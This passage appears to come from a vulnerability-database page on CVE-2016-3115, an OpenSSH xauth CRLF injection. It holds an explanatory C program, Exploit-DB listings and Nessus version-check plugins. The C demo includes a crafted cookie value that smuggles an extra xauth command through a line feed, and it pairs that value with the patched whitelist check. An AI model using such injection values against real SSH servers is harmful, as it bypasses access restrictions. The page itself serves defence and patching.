CVE-2016-3115

CVSS v3 base metrics
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: LOW
Confidentiality impact: LOW
Integrity impact: LOW
Availability impact: NONE

Summary
Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH before 7.2p2 allow remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions.
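The summary above gives the mechanism only in outline. The C program below is an added illustration written for this page, not code from OpenSSH and not the Exploit-DB script: it models how sshd hands the client-supplied X11 authentication protocol name and cookie to xauth(1) over a pipe, shows why an embedded line feed turns the cookie into an extra xauth command, and reimplements the character whitelist that OpenSSH 7.2p2 introduced in session.c (alphanumerics plus . : / - _; this is a from-memory model of that check, not a copy of it). The display name unix:10.0, the cookie values and the injected info command are constructed sample inputs, and the remove/add line pair is a simplification of what sshd actually writes.

```c
/*
 * Added example for CVE-2016-3115 (not OpenSSH source, not the EDB-39569
 * exploit). When a client sends an x11-req channel request, sshd later
 * starts "xauth -q -" and writes lines of the form
 *     remove <display>
 *     add <display> <proto> <cookie>
 * to its stdin (simplified here). proto and cookie arrive verbatim from
 * the client. Before OpenSSH 7.2p2 they were not validated, so a cookie
 * containing "\n" ends the "add" line early and whatever follows is
 * parsed by xauth as a further command.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/*
 * Whitelist modelled on the check OpenSSH 7.2p2 added to session.c:
 * alphanumerics plus '.', ':', '/', '-', '_'. CR, LF, spaces and shell
 * metacharacters all fail, so no second xauth command can be smuggled in.
 */
int xauth_valid_string(const char *s)
{
    for (size_t i = 0; s[i] != '\0'; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '.' && c != ':' && c != '/' &&
            c != '-' && c != '_')
            return 0;
    }
    return 1;
}

/*
 * Build the text sshd would pipe into xauth. validate == 0 reproduces the
 * unchecked pre-7.2p2 behaviour; validate != 0 applies the whitelist and
 * refuses the request (returns -1, writes nothing) the way 7.2p2 does.
 * Returns the script length on success.
 */
int build_xauth_script(const char *display, const char *proto,
                       const char *cookie, int validate,
                       char *out, size_t outlen)
{
    if (validate && !(xauth_valid_string(proto) && xauth_valid_string(cookie)))
        return -1;   /* sshd logs "Invalid X11 forwarding data" at this point */

    int n = snprintf(out, outlen, "remove %s\nadd %s %s %s\n",
                     display, display, proto, cookie);
    if (n < 0 || (size_t)n >= outlen)
        return -1;   /* truncated: fail rather than run a partial script */
    return n;
}

/* Number of commands xauth would execute: one per non-empty line. */
int count_xauth_commands(const char *script)
{
    int cmds = 0, at_line_start = 1;
    for (const char *p = script; *p != '\0'; p++) {
        if (*p == '\n') { at_line_start = 1; continue; }
        if (at_line_start) { cmds++; at_line_start = 0; }
    }
    return cmds;
}

/*
 * Convenience wrapper: how many xauth commands one x11-req would produce,
 * or -1 if the (validating) server rejects it. The display name is a
 * constructed sample value.
 */
int xauth_commands_for(const char *proto, const char *cookie, int validate)
{
    char script[512];
    int n = build_xauth_script("unix:10.0", proto, cookie, validate,
                               script, sizeof script);
    return n < 0 ? -1 : count_xauth_commands(script);
}

int main(void)
{
    /* Constructed sample inputs, not captured traffic. */
    const char *proto   = "MIT-MAGIC-COOKIE-1";
    const char *benign  = "c0ffee1234abcd5678";
    const char *crafted = "c0ffee\ninfo";      /* the LF smuggles an 'info' command */
    char script[512];

    build_xauth_script("unix:10.0", proto, crafted, 0, script, sizeof script);
    printf("unchecked sshd would feed xauth:\n%s", script);
    printf("benign cookie  -> %d command(s)\n", xauth_commands_for(proto, benign, 0));
    printf("crafted cookie -> %d command(s) unchecked, %d after the 7.2p2 check\n",
           xauth_commands_for(proto, crafted, 0),
           xauth_commands_for(proto, crafted, 1));
    return 0;
}
```

Build with cc -std=c99 and run; the crafted cookie yields three xauth commands on the unchecked path and is refused outright on the validating path. The practical point for defenders: this only matters on servers with X11Forwarding yes (sshd's default is no) for accounts that are otherwise confined by ForceCommand, an authorized_keys command= option or a similar restriction, because an unrestricted user can already run xauth directly. OpenSSH 7.2p2 and the distribution backports listed on this page reject the request before xauth is ever started; until a host is patched, setting X11Forwarding no in sshd_config closes the path.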
Vulnerable Configurations
Exploit-Db

EDB-ID:40858
description: BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Root Exploit. Remote exploit for Hardware platform
id: EDB-ID:40858
last seen: 2016-12-04
modified: 2016-12-04
published: 2016-12-04
reporter: Exploit-DB
source: https://www.exploit-db.com/download/40858/
title: BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Root Exploit

EDB-ID:39569
description: OpenSSH 7.2p1 - xauth Injection. CVE-2016-3115. Remote exploits for multiple platform
file: exploits/multiple/remote/39569.py
id: EDB-ID:39569
last seen: 2016-03-17
modified: 2016-03-16
platform: multiple
port: 22
published: 2016-03-16
reporter: tintinweb
source: https://www.exploit-db.com/download/39569/
title: OpenSSH <= 7.2p1 - xauth Injection
type: remote
Nessus
NASL family: Huawei Local Security Checks
NASL id: EULEROS_SA-2016-1008.NASL
description: According to the versions of the openssh packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :
- It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115)
- An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908)
Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen: 2020-05-06
modified: 2017-05-01
plugin id: 99771
published: 2017-05-01
reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/99771
title: EulerOS 2.0 SP1 : openssh (EulerOS-SA-2016-1008)
code:

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(99771);
  script_version("1.13");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/05/04");

  script_cve_id(
    "CVE-2016-1908",
    "CVE-2016-3115"
  );

  script_name(english:"EulerOS 2.0 SP1 : openssh (EulerOS-SA-2016-1008)");
  script_summary(english:"Checks the rpm output for the updated packages.");

  script_set_attribute(attribute:"synopsis", value:
"The remote EulerOS host is missing multiple security updates.");
  script_set_attribute(attribute:"description", value:
"According to the versions of the openssh packages installed, the
EulerOS installation on the remote host is affected by the following
vulnerabilities :

  - It was discovered that the OpenSSH server did not
    sanitize data received in requests to enable X11
    forwarding. An authenticated client with restricted SSH
    access could possibly use this flaw to bypass intended
    restrictions. (CVE-2016-3115)

  - An access flaw was discovered in OpenSSH the OpenSSH
    client did not correctly handle failures to generate
    authentication cookies for untrusted X11 forwarding. A
    malicious or compromised remote X application could
    possibly use this flaw to establish a trusted connection
    to the local X server, even if only untrusted X11
    forwarding was requested. (CVE-2016-1908)

Note that Tenable Network Security has extracted the preceding
description block directly from the EulerOS security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.");
  # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1008
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?48f275ff");
  script_set_attribute(attribute:"solution", value:
"Update the affected openssh packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");

  script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/01");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh-askpass");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh-clients");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh-keycat");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh-server");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:huawei:euleros:2.0");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Huawei Local Security Checks");
  script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/EulerOS/release", "Host/EulerOS/rpm-list", "Host/EulerOS/sp");
  script_exclude_keys("Host/EulerOS/uvp_version");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

release = get_kb_item("Host/EulerOS/release");
if (isnull(release) || release !~ "^EulerOS") audit(AUDIT_OS_NOT, "EulerOS");
if (release !~ "^EulerOS release 2\.0(\D|$)") audit(AUDIT_OS_NOT, "EulerOS 2.0");

sp = get_kb_item("Host/EulerOS/sp");
if (isnull(sp) || sp !~ "^(1)$") audit(AUDIT_OS_NOT, "EulerOS 2.0 SP1");

uvp = get_kb_item("Host/EulerOS/uvp_version");
if (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, "EulerOS 2.0 SP1", "EulerOS UVP " + uvp);

if (!get_kb_item("Host/EulerOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "aarch64" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "EulerOS", cpu);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_ARCH_NOT, "i686 / x86_64", cpu);

flag = 0;

pkgs = ["openssh-6.6.1p1-25.4.h3",
        "openssh-askpass-6.6.1p1-25.4.h3",
        "openssh-clients-6.6.1p1-25.4.h3",
        "openssh-keycat-6.6.1p1-25.4.h3",
        "openssh-server-6.6.1p1-25.4.h3"];

foreach (pkg in pkgs)
  if (rpm_check(release:"EulerOS-2.0", sp:"1", reference:pkg)) flag++;

if (flag)
{
  security_report_v4(
    port       : 0,
    severity   : SECURITY_HOLE,
    extra      : rpm_report_get()
  );
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh");
}
NASL family: Fedora Local Security Checks
NASL id: FEDORA_2016-D339D610C1.NASL
description: This update provides recent upstream fix published with openssh-7.2p2 (#1316529). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen: 2020-06-05
modified: 2016-04-01
plugin id: 90285
published: 2016-04-01
reporter: This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/90285
title: Fedora 22 : openssh-6.9p1-11.fc22 (2016-d339d610c1)
code:

#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2016-d339d610c1.
#

include("compat.inc");

if (description)
{
  script_id(90285);
  script_version("2.5");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");

  script_cve_id("CVE-2016-3115");
  script_xref(name:"FEDORA", value:"2016-d339d610c1");

  script_name(english:"Fedora 22 : openssh-6.9p1-11.fc22 (2016-d339d610c1)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Fedora host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"This update provides recent upstream fix published with openssh-7.2p2
(#1316529).

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.redhat.com/show_bug.cgi?id=1316829"
  );
  # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/180491.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?9163a8a7"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected openssh package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:openssh");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:22");

  script_set_attribute(attribute:"patch_publication_date", value:"2016/03/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/04/01");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Fedora Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^22([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 22.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);

flag = 0;
if (rpm_check(release:"FC22", reference:"openssh-6.9p1-11.fc22")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh");
}
NASL family: Red Hat Local Security Checks
NASL id: REDHAT-RHSA-2016-0465.NASL
description: Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 90078
published: 2016-03-22
reporter: This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/90078
title: RHEL 7 : openssh (RHSA-2016:0465)
code:

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2016:0465. The text
# itself is copyright (C) Red Hat, Inc.
#

include("compat.inc");

if (description)
{
  script_id(90078);
  script_version("2.17");
  script_cvs_date("Date: 2019/10/24 15:35:41");

  script_cve_id("CVE-2016-1908", "CVE-2016-3115");
  script_xref(name:"RHSA", value:"2016:0465");

  script_name(english:"RHEL 7 : openssh (RHSA-2016:0465)");
  script_summary(english:"Checks the rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Red Hat host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Updated openssh packages that fix two security issues are now
available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having Moderate
security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.

OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These
packages include the core files necessary for both the OpenSSH client
and server.

It was discovered that the OpenSSH server did not sanitize data
received in requests to enable X11 forwarding. An authenticated client
with restricted SSH access could possibly use this flaw to bypass
intended restrictions. (CVE-2016-3115)

An access flaw was discovered in OpenSSH; the OpenSSH client did not
correctly handle failures to generate authentication cookies for
untrusted X11 forwarding. A malicious or compromised remote X
application could possibly use this flaw to establish a trusted
connection to the local X server, even if only untrusted X11
forwarding was requested. (CVE-2016-1908)

All openssh users are advised to upgrade to these updated packages,
which contain backported patches to correct these issues. After
installing this update, the OpenSSH server daemon (sshd) will be
restarted automatically."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/errata/RHSA-2016:0465"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-1908"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-3115"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-askpass");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-clients");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-keycat");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-ldap");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-server");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-server-sysvinit");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.2");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.3");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.4");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.5");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.6");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.7");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Red Hat Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
os_ver = os_ver[1];
if (! preg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 7.x", "Red Hat " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);

yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (!empty_or_null(yum_updateinfo))
{
  rhsa = "RHSA-2016:0465";
  yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
  if (!empty_or_null(yum_report))
  {
    security_report_v4(
      port       : 0,
      severity   : SECURITY_HOLE,
      extra      : yum_report
    );
    exit(0);
  }
  else
  {
    audit_message = "affected by Red Hat security advisory " + rhsa;
    audit(AUDIT_OS_NOT, audit_message);
  }
}
else
{
  flag = 0;
  if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-askpass-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-askpass-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-clients-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-clients-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", reference:"openssh-debuginfo-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-keycat-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-keycat-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-ldap-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-ldap-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-server-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-server-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-server-sysvinit-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-server-sysvinit-6.6.1p1-25.el7_2")) flag++;
  if (rpm_check(release:"RHEL7", reference:"pam_ssh_agent_auth-0.9.3-9.25.el7_2")) flag++;

  if (flag)
  {
    security_report_v4(
      port       : 0,
      severity   : SECURITY_HOLE,
      extra      : rpm_report_get() + redhat_report_package_caveat()
    );
    exit(0);
  }
  else
  {
    tested = pkg_tests_get();
    if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
    else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-debuginfo / etc");
  }
}
NASL family: Fedora Local Security Checks
NASL id: FEDORA_2016-FC1CC33E05.NASL
description: Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen: 2020-06-05
modified: 2016-04-27
plugin id: 90740
published: 2016-04-27
reporter: This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/90740
title: Fedora 22 : gsi-openssh-6.9p1-8.fc22 (2016-fc1cc33e05)
code:

#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2016-fc1cc33e05.
#

include("compat.inc");

if (description)
{
  script_id(90740);
  script_version("2.4");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");

  script_cve_id("CVE-2016-3115");
  script_xref(name:"FEDORA", value:"2016-fc1cc33e05");

  script_name(english:"Fedora 22 : gsi-openssh-6.9p1-8.fc22 (2016-fc1cc33e05)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Fedora host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Sync with openssh package.

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.redhat.com/show_bug.cgi?id=1318201"
  );
  # https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183101.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?354d4b7a"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected gsi-openssh package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:gsi-openssh");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:22");

  script_set_attribute(attribute:"patch_publication_date", value:"2016/04/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/04/27");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Fedora Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^22([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 22.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);

flag = 0;
if (rpm_check(release:"FC22", reference:"gsi-openssh-6.9p1-8.fc22")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "gsi-openssh");
}
NASL family: Fedora Local Security Checks
NASL id: FEDORA_2016-08E5803496.NASL
